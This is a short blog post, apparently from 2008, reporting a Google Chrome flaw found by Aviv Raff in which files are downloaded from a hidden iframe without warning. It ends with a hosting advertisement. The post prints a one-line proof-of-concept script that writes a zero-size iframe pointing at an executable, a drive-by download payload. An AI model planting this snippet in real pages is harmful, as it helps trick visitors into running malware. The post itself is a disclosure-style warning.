Google Chrome became one of the most widely popular browser quite in a short time. However Just within the one week of the release of the most awaited browser on the web, we have been reported of a very serious security defect within the browser. The exploit itself is not very serious but this flaw when merged with a little bit of social engineering can make you computer at a prominent risk.

Originally discovered by a security expert Aviv Raff, has set up a demo of the exploit which shows you how it can be a threat. Be advised that the demo page when opened in Google Chrome download as java file which when clicked on executes a notepad like program written in JAVA

The Proof of Concept is that Google Chrome does not warn you before downloading anything in an IFRAME and neither does it warn you before opening the downloaded file. So any one new to the browsers User Interface (UI) can be mislead easily on clicking the downloaded file thinking it to be a part of the web page.

The exploit is as simple as this

<script>

document.write(‘<iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″>’);

</script>

Google has already been notified about this and might be working on it, however there is not update or patch released yet. So we recommend you all to stop using Google Chrome for a while (not always) but until a security patch is released by Google. And personally, I still adore Firefox

Compare our best rates of dedicated hosting and cheap web hosting with other companies. We offer quality web design services on very low prices. Choose your desired domain name registration method, online, cash or via cheque.

Related posts:

1. Over 10+ Keyboard Shortcuts for Windows XP (Some You Probably Might Not Know)